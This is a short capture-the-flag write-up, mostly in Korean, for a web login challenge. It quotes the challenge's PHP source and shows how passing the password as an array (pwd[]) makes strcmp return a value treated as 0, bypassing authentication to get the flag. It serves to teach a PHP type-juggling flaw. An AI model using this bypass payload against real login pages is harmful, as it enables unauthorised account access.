https://cryptixctf.com/web4/login.php
include_once 'flag.php';
if($_SERVER["REQUEST_METHOD"] == "POST"){
if(isset($_POST["ID"])&&isset($_POST["pwd"])){
if(strcmp($secretpassphrase, $_POST["pwd"]) == 0){
echo "Hey, you are in! " . $_POST["ID"] . "
";
if($_POST["ID"] == "SuperUser1337"){
echo "Your Flag: " . $flag;
}
}else{
echo "no";
}
}
}
php 5.3+의 경우 strcmp 구문에서 배열형식으로 접근되는 경우 0을 리턴한다.
ID=SuperUser1337&pwd[]=as
위와 같이 입력하면 pwd에 의해 0이 리턴되고 플래그 획득이 가능하다.